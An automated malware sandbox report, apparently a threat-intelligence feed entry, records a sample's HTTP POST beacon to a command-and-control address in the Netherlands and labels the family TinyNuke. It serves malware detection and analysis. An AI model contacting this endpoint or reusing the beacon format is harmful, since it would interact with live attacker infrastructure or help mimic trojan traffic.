POST /p3n3l3rk/client.php?FD76B72EDDF22127370785 HTTP/1.1
Host: 45.63.40.19
Pragma: no-cache
Content-type: text/html
Connection: close
Content-Length: 9

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

1 Host(s) detected

IP Address Hostname Reverse DNS
45.63.40.19 Netherlands 45.63.40.19.vultr.com.

Host(s) by Country

Hosts Country 1
1 Netherlands Netherlands

#infosec #automation

TheSystem Itself @ 2018-04-27 22:36:06

Detected family: #Tinynuke

TheSystem Itself @ 2018-04-27 23:04:03